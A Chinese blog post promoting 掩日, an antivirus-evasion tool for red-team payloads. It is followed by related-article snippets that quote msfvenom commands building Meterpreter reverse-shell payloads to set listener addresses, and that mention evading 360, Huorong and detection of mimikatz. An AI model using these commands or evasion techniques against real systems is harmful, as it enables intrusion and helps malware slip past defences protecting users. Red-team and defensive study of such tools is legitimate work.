掩日:红队行动中的综合免杀利器

最新推荐文章于 2024-08-09 08:37:22 发布
最新推荐文章于 2024-08-09 08:37:22 发布
阅读量503 收藏 7
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00068/article/details/139517066
版权

掩日:红队行动中的综合免杀利器

AV_Evasion_Tool掩日 - 免杀执行器生成工具项目地址:https://gitcode.com/gh_mirrors/ave/AV_Evasion_Tool

项目Logo

在网络安全的世界里,对抗是永不停息的主题。当红队执行任务时,如何确保渗透工具逃避杀毒软件的监控,成为了至关重要的一环。这就是掩日——一个专为红队设计的综合免杀工具,它的存在就是为了提供强大的隐蔽性,让你的行动更加悄无声息。

项目介绍

掩日是一款高效且灵活的免杀工具,由xred团队开发,旨在帮助安全研究员和红队成员在面对严格的安全防护时,能够绕过杀软检测并顺利执行任务。它提供了多种免杀策略,包括本地分离、网络分离等,并支持使用C语言和Go语言生成负载。此外,还包括了杀软对比和更新检测等功能,确保你的工具始终处于最新的避检状态。

项目技术分析

掩日采用了先进的编译技术和混淆手段,以减少其在内存中的特征被识别的风险。其中,它支持两种编译器:tdm-gcc和tcc,允许用户根据需求选择生成体积更小但可能不支持图标自定义的tcc编译器,或是支持更多功能的tdm-gcc。通过这些技术,掩日能够生成难以被杀软识别的可执行文件,提高渗透攻击的成功率。

此外,该工具集成了动态生成shellcode的能力,使得恶意代码能够在避开防病毒系统的检查后,再进行加载和执行。这对于避免一次性静态特征码的暴露十分有用。

应用场景

掩日广泛应用于红队演练、渗透测试以及安全研究。在以下场景中,它能发挥显著作用:

  1. 模拟攻击测试:测试企业网络安全防御体系的抗渗透能力。
  2. 漏洞利用:配合漏洞利用工具,绕过杀软保护,成功植入木马或控制目标系统。
  3. 隐秘通信:通过网络分离技术,实现安全的数据传输。

项目特点

  1. 多语言支持:兼容C语言和Go语言,为编写复杂免杀代码提供更多可能性。
  2. 高度自定义:用户可自定义编译器、选择免杀策略和生成路径。
  3. 智能配置:YRConfig.ini 文件使设置变得简单直观,无需深入代码层面。
  4. 实时更新检测:定期获取更新,保持与最新杀软对抗策略同步。
  5. 直观界面:采用HandyControls库构建的图形用户界面,操作简便,一目了然。

要体验掩日的强大功能,只需按照项目说明配置好依赖,即可轻松上手。记住,合理利用这样的工具,可以有效提升你在网络安全领域的实践技能。立即下载掩日,为你的红队行动增加一份安全保障吧!

下载链接

AV_Evasion_Tool掩日 - 免杀执行器生成工具项目地址:https://gitcode.com/gh_mirrors/ave/AV_Evasion_Tool

芮奕滢Kirby
关注
FourEye 免杀
战神/calmness的博客
12-25 890
生成木马 root@kali:~/桌面# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.28.130 LPORT=444 -f raw -o shellcode.raw msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 exploit(multi/handler) > se..
免杀工具 做免杀必备
05-10
免杀不错的工具哦 在这里先上传一个 还有的会再传的
mimikatz免杀过360和火绒
qq_44905657的博客
12-28 2133
mimikatz mimikatz是一款能够从Windows认证(LSASS)的进程获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网。也可以通过明文密码或者hash值进行提权。这款工具机器出名所以被查杀的几率极高。 1、免杀方式 对mimikatz我们进行源码免杀。源码免杀只需要定位源码的特征代码进行修改就可以达到预期的免杀效果。一般的定位特征码分为三种:定位倒代码上,定位到字符串上,定位到输入表上。 2、免杀处理 我们访问https://github.com/genti
掩日 - 免杀执行器生成工具 使用指南
gitblog_00851的博客
08-09 641
掩日 - 免杀执行器生成工具 使用指南 AV_Evasion_Tool掩日 - 免杀执行器生成工具项目地址:https://gitcode.com/gh_mirrors/ave/AV_Evasion_Tool 项目介绍 掩日是一款强大的免杀执行器生成工具,由开发者 1y0n 在 GitHub 上维护。该工具设计用于避开常见的安全软件检测,通过一系列技术手段使生成的执行文件能够绕过大多数防病毒软件...
【新版】掩日免杀windows Defender
crowsec
06-05 6445
掩日免杀是一个非常优秀的项目,目前在`4月19`号已经更新,更新的变动较大,支持的种类更多,在这里再试试现在的效果如何:
网络安全进阶篇之免杀(十四章-8)使用掩日配合CS免杀360
划水的小白白
05-30 1052
文章目录一、 概念1.1 360 安全卫士和 360 杀毒二、前期准备2.1 下载地址三、具体过程3.1 使用CS生成payload3.2 免杀过3603.3 免杀火绒 一、 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全心出品的一款免费的云安全杀毒软件。 它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀引擎、 Avira(小红伞)病毒查杀引擎、360 云查杀引擎、 360 主动防御引擎以及 360 第二代 QVM 人工智能引擎。 二
掩日免杀笔记
crowsec
06-01 4607
微信公众号:乌鸦安全 扫取二维码获取更多信息! 1. 环境 攻击机: kali linux 10.211.55.23 受害机: Windows10 360主动防御 Windows7 火绒主动防御 2. 生成exe文件 在kali linux下使用msfvenom生成一个64位的exe文件 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f exe ...
掩日:打造你的隐形战士 - 红队专属免杀工具深度探索
最新发布
gitblog_00613的博客
08-09 863
掩日:打造你的隐形战士 - 红队专属免杀工具深度探索 AV_Evasion_Tool掩日 - 免杀执行器生成工具项目地址:https://gitcode.com/gh_mirrors/ave/AV_Evasion_Tool 在这个信息安全日益重要的时代,红蓝对抗已成为检验网络安全防护能力的重要方式。而其免杀工具,则像是红队的隐形斗篷,让攻击行动更加隐秘,难以被发现。今天,我们来深入探讨一...
新版掩日免杀——搭配CS使用测试
ZxC789456302的博客
10-05 1826
使用工具:掩日免杀 环境需求: 64位 Windows 7 或以上操作系统 .net framework 4.5 或更高
红队培训班作业 | 免杀过360和火绒 四种方法大对比
Ms08067安全实验室
08-16 2966
文章来源|MS08067 红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员)按老师要求尝试完成布置的作业如下:环境准备:Kali linux安装cs4.2,Windows7系统...
免杀手法 免杀笔记 免杀技巧
07-15
免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧
源码免杀工具
12-14
自己写的一个源码免杀工具 简单实用 免杀源码 远控源码免杀工具
千机:红队免杀木马自动生成器 - 一键打造你的攻防利器
gitblog_00055的博客
05-25 464
千机:红队免杀木马自动生成器 - 一键打造你的攻防利器 项目地址:https://gitcode.com/Pizz33/Qianji 项目简介 在信息安全领域,攻防对抗是一场永不停歇的较量。"千机"是由Hyyrent开发的一款创新性的红队工具,它是一款专为安全研究人员和攻防竞赛参与者设计的免杀木马自动生成器。只需简单的操作,你就能轻松创建难以被杀毒软件察觉的Stageless...
红队搬运工-github有趣的免杀项目分享
Gamma_lab的博客
03-17 1829
前言: ​ github一直是it行业最大的同性交流网站,上面的开源好项目非常之多,不少的渗透好工具都出自github上面的大佬,尤其是免杀的loader,github一直是好免杀的藏宝阁,拿来就能用,拿来就能免,除非被杀软标记很多的项目,大部分免杀效果都很好的。 分享: 1.DPlant github链接:https://github.com/trickster0/UDPlant 介绍:UDP版本的反向shell工具,在 windows 和 linux 都能完美运行 开发语言:rust 推荐理由:rus
Foureye实现免杀
reaido的博客
01-29 634
一、项目地址 https://github.com/lengjibo/FourEye 推荐挂代理 二、相关命令 git clone https://github.com/lengjibo/FourEye.git cd FourEye pip install -r requirements.txt 三、msfvenom生成shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=39.104.56.140 LPORT=7100 -f raw -o
掩日 - 免杀执行器生成工具使用教程
gitblog_00157的博客
08-09 316
掩日 - 免杀执行器生成工具使用教程 AV_Evasion_Tool掩日 - 免杀执行器生成工具项目地址:https://gitcode.com/gh_mirrors/ave/AV_Evasion_Tool 1. 项目的目录结构及介绍 AV_Evasion_Tool/ ├── README.md ├── LICENSE ├── src/ │ ├── main.c │ ├── config...
shellCode免杀技巧
qq_39330735的博客
05-15 2641
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
Shellcode免杀,绕过360安全卫士、火绒安全、腾讯管家
热门推荐
qq_1873822的博客
08-22 1万+
前言 分享一个傻瓜式直接套用大佬的框架进行shellcode免杀,自己还是萌新还需要学习很多东西,大佬们不喜勿喷 杀毒原理 360、腾讯电脑管家、火绒剑、金山毒霸、瑞星等等,这几个杀毒软件领头羊,现在的杀毒软件都无法脱离三个部分,扫描器、病毒库、虚拟机。然而一个杀毒软件做的是否好用,最主要的还是扫描器的速度、准确率以及病毒库是否庞大。 1.基于特征码的静态扫描技术 这种技术很容易被人想到,所以第一代的杀毒软件出现了,他们的杀毒思想就是,我只要匹配到特征字符串就可以判断出来这个文件是一个病毒。但这种方法在当今
shellcode不是一段16进制的机器码吗?你为啥说能直接执行呢?应该是需要先编译成二进制可执行文件吧?msf生成的shellcode为什么要区分输出格式?掩日免杀是c格式的shellcode的生成器吗?如果换了一个格式的shellcode,掩日免杀还能正常工作吗?
04-29
你说得没错,shellcode是一段16进制的机器码,需要先编译成可执行文件才能运行。但是在实际的攻击,攻击者通常会将shellcode注入到漏洞处,然后通过控制程序流程将其直接执行,而不需要将其编译成可执行文件。 msf生成的shellcode区分输出格式,是因为不同的载荷需要不同的格式来生成shellcode。例如,如果是用于缓冲区溢出的payload,通常需要生成C语言格式的shellcode,而如果是用于注入到远程进程的payload,通常需要生成raw格式的shellcode。 掩日免杀是一个c格式的shellcode生成器,可以生成多种不同格式的shellcode。如果换了一个格式的shellcode,掩日免杀可能无法正常工作,需要进行相应的修改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芮奕滢Kirby

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值